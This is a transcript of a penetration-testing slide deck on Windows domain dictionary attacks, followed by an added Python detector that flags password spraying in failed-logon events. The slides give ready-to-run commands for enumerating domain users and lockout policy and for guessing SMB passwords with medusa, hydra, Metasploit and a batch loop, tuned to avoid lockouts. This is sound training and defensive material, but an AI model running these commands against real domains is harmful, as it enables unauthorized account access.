Introduction to Windows Dictionary Attacks

Transcript

  1. Introduction to Windows Dictionary Attacks
     Author: Scott Sutherland
  2. Who am I?
     Scott Sutherland
     • Security Consultant @ NetSPI
     • Over 10 years of consulting experience
     • Security researcher: blogs, white papers, tools, etc.
  3. Presentation Goals
     • Identify the value of dictionary attacks
     • Provide new penetration testers with a safe approach to Windows dictionary attacks
     • Provide security professionals with questions they should be asking their contractors
  4. Before we begin…
     Dictionary Attack
     Brute Force Attack
  5. Why dictionary attacks?
     What are the goals?
     • Identify accounts configured with weak or default passwords – "It's human nature"
     • Use accounts as entry points during penetration tests
     What's the impact?
     • Unauthorized access to critical:
       ‒ Systems
       ‒ Applications
       ‒ Data
     • User impersonation
  6. Are There Alternatives?
     Yes. Approaches typically include:
     • Cracking password hashes offline with:
       ‒ Pre-computed hash libraries like Rainbow Tables
       ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper
     • Dumping clear text passwords from interactive sessions with Mimikatz
  7. Will Alternatives be Covered?
     No.
  8. Dictionary Attacks: Process Overview
     Windows Dictionary Attack Process
       1. Identify domains
       2. Enumerate domain controllers
       3. Enumerate domain users
       4. Enumerate domain lockout policy
       5. Create a dictionary
       6. Perform attack
  9. Identify Domains: Methods
     Unauthenticated Methods
     • DHCP information
     • NetBIOS queries
     • DNS queries
     • Sniffing network traffic
     • Review RDP drop-down lists
     Authenticated Methods
     • Review the output of the SET command for "USERDNSDOMAIN"
     • Review the registry for the default domain
  10. Identify Domains: Tools
     DHCP Info (Auth: No)
       IPCONFIG
     NetBIOS Queries (Auth: No)
       NBTSTAT -A <IP>
     DNS Queries (Auth: No)
       nmap -sL <IP Range> -oA output_rnds
       ./reverseraider -r <IP Range>
       ./dnswalk victim.com
       perl fierce.pl -dns <domainname> -threads 5 -file <domainname>-dns.output
     Sniffing (Auth: No)
       Wireshark (GUI) + filter for browser traffic
       Network Miner (GUI)
       Etherape (GUI)
     RDP Drop Down (Auth: No)
       nmap -sS -PN -p3389 <IP Range>, then visit with an RDP client
  11. Enumerate DCs: Methods
     Unauthenticated Methods
     • DNS queries
     • RPC queries
     • Port scanning
     • NetBIOS scanning
     Authenticated Methods
     • NET GROUP commands
     • LDAP queries
  12. Enumerate DCs: Tools
     DNS Queries (Auth: No)
       NSLOOKUP -type=SRV _ldap._tcp.<domain>
     RPC Queries (Auth: No)
       NLTEST /DCLIST <domain>
       FindPDC <domain> <request count>
     Port Scanning (Auth: No)
       NMAP -sS -p389,636 -PN <IP Range>
     NetBIOS Scanning (Auth: No)
       FOR /F "tokens=*" %i in ('type ips.txt') do NBTSTAT -A %i
     NET GROUP Command (Auth: Yes)
       net group "Domain Controllers" /domain
     LDAP Queries (Auth: Yes & No)
       LDAP Administrator (GUI tool)
       Hyena (GUI tool)
       adfind -b -sc dcdmp <domain> -gc | grep -i ">name:" | gawk -F " " "{print $2}" | sort | uniq
  13. Enumerate Domain Users: Methods
     Unauthenticated Methods
     • RPC queries
     • SID brute forcing
     • SNMP queries
     • LDAP queries
     • SharePoint fuzzing
     Authenticated Methods
     • NET USER command
     • WMI commands
  14. Enumerate Domain Users: Tools 1
     RPC Endpoints (Auth: Yes & No)
       dumpsec.exe /computer=<IP> /rpt=usersonly /saveas=csv /outfile=domain_users.txt
       enum -N <ip>
       enum -U <ip>
     SID Brute Forcing (Auth: Yes & No)
       ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_lookupsid SMBDomain=. MaxRID=10000 RHOSTS=<IP Address> E > domain_users.txt
       Getacct (GUI)
     SNMP Queries (Auth: Yes & No)
       ruby c:\metasploit\msf3\msfcli auxiliary/scanner/snmp/snmp_enumusers SMBDomain=. RHOSTS=<IP Address> E
       Mibbrowser (GUI)
       SNMP Walk
  15. Enumerate Domain Users: Tools 2
     LDAP Queries (Auth: Yes & No)
       adfind -b DC=<victim>,DC=<com> -f "objectcategory=user" -gc | grep -i "sAMAccountName:" | gawk -F ":" "{print $2}" | gawk -F " " "{print $1}" | sort > domain_users.txt
     SharePoint Fuzzing (Auth: Yes & No)
       Fuzz parameters with Burp to enumerate domain users. Example URL below:
       https://www.[website].com/sites/[sitename]/_layouts/userdisp.aspx?Force=True&ID=[2]
     NET USERS Command (Auth: Yes)
       net users /domain > domain_users.txt
     WMI Commands (Auth: Yes)
       wmic /user:<user> /password:<password> /node:<IP address> domain_users.txt
  16. Get Domain Lockout Policy: Methods
     Unauthenticated Methods
     • RPC endpoints
     Authenticated Methods
     • NET ACCOUNTS command
     What does it all mean?
     • Threshold, duration, and window
       Lockout threshold: 5
       Lockout duration: 15
       Lockout observation window: 15
  17. Get Domain Lockout Policy: Tools
     RPC Queries (Auth: Yes & No)
       enum -P <IP Address>
       dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt
     NET ACCOUNTS Command (Auth: Yes)
       NET ACCOUNTS
  18. Create a Dictionary: Methods
     Classics Still Work
     • Blank
     • Username as password
     • password
     Common Formulas = Most Effective
     • <Password><Number>
     • <Companyname><Number>
     • <Season><Year>
     • <Sports team><Number>
     Popular Dictionaries
     • Metasploit dictionaries
     • RockYou
     • FuzzDB
     • John the Ripper
  19. Create a Dictionary: Tools
     Classics
       Blank password
       Username as password
       password as password
     Formulas
       <Password><Number>
       <Companyname><Number>
       <Season><Year>
       <Sports team><Number>
     Your Brain!
       Think of keywords relevant to the target company / geographic location and you'll get more out of your dictionary attacks!
     RockYou
       http://www.skullsecurity.org/wiki/index.php/Passwords
     FuzzDB
       http://code.google.com/p/fuzzdb/
       https://github.com/rustyrobot/fuzzdb
     John the Ripper
       http://www.openwall.com/wordlists/
  20. Perform Dictionary Attack: Rules
     The Rule to Live By: Respect the lockout policy
     • General idea = attempt a few passwords for all of the domain users each round, not 1000 passwords against one user
     • Subtract 2 attempts from the lockout policy
       Example: Lockout=5, Attempts=3
     • Wait 5 to 10 minutes beyond the observation window
  21. Perform Dictionary Attack: Tools
     Medusa (Linux)
       medusa -H hosts.txt -U users.txt -P passwords.txt -T 20 -t 10 -L -F -M smbnt
     Bruter (Windows)
       Easy to use GUI and no CLI that I know of.
     Metasploit smb_login (Windows and Linux)
       ruby c:\metasploit\msf3\msfcli auxiliary/scanner/smb/smb_login THREADS=5 BLANK_PASSWORDS=true USER_AS_PASS=true PASS_FILE=c:\passwords.txt USER_FILE=c:\allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E
     Hydra (Windows and Linux)
       hydra.exe -L users.txt -P passwords.txt -o credentials.txt <ip> smb
     Batch Script (Windows)
       FOR /F "tokens=*" %a in ('type passwords.txt') do net use \\<ip>\IPC$ /user:<user> %a
  22. Conclusions
     • There is more than one way to do everything!
     • Enumerate all available options
     • It's easy to lock out accounts – respect the password policy
     • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests
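As an added defender-side example (not part of the presentation), the following Python script turns the lockout arithmetic of slides 16 and 20 around: it scans constructed Event ID 4625 (failed logon) lines for a source that fails logons against many distinct accounts while staying under the lockout threshold inside one observation window, which is exactly the footprint the "rule to live by" leaves on a domain controller. The key=value log format, the field names, and the minimum-account tuning value are assumptions.

```python
# Added example (not from the presentation): detect the "few passwords, many users"
# pattern from slides 16 and 20. A tester who keeps each account below the lockout
# threshold never generates 4740 lockout events, so the defender must count
# distinct accounts per source inside the observation window instead.
from collections import defaultdict
from datetime import datetime, timedelta

LOCKOUT_THRESHOLD = 5              # slide 16 example policy
OBSERVATION_WINDOW = timedelta(minutes=15)
MIN_DISTINCT_ACCOUNTS = 10         # hypothetical tuning value, not from the slides

def parse_4625(line):
    """Parse one constructed 'key=value' log line; return (time, source_ip, user) or None."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    if fields.get("EventID") != "4625":
        return None
    return (datetime.fromisoformat(fields["Time"]), fields["IpAddress"],
            fields["TargetUserName"].lower())

def detect_spray(lines, threshold=LOCKOUT_THRESHOLD, window=OBSERVATION_WINDOW,
                 min_accounts=MIN_DISTINCT_ACCOUNTS):
    """Return {source_ip: sorted accounts} for sources that touch >= min_accounts
    distinct accounts within one observation window while each account stays
    under the lockout threshold (the behaviour slide 20 recommends)."""
    events = sorted(e for e in map(parse_4625, lines) if e)
    by_src = defaultdict(list)
    for ts, ip, user in events:
        by_src[ip].append((ts, user))
    alerts = {}
    for ip, evs in by_src.items():
        for i, (start, _) in enumerate(evs):   # slide every window start over the source's events
            per_user = defaultdict(int)
            for ts, user in evs[i:]:
                if ts - start > window:
                    break
                per_user[user] += 1
            low_and_slow = [u for u, n in per_user.items() if n < threshold]
            if len(low_and_slow) >= min_accounts:
                alerts[ip] = sorted(low_and_slow)
                break
    return alerts

# Constructed sample: 10.0.0.5 tries 3 passwords (threshold 5 minus 2) against 12 accounts;
# 10.0.0.9 is a single user mistyping a password four times and must not alert.
SAMPLE_LOG = [
    f"EventID=4625 Time=2024-01-01T09:{m:02d}:00 IpAddress=10.0.0.5 TargetUserName=user{u:02d}"
    for m in range(3) for u in range(12)
] + [
    f"EventID=4625 Time=2024-01-01T09:0{m}:30 IpAddress=10.0.0.9 TargetUserName=jsmith"
    for m in range(4)
]

if __name__ == "__main__":
    print(detect_spray(SAMPLE_LOG))
```

In a real deployment the threshold and window come from NET ACCOUNTS on the domain (slide 17) rather than constants, and the sample lines would be replaced by 4625 events exported from the domain controllers.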
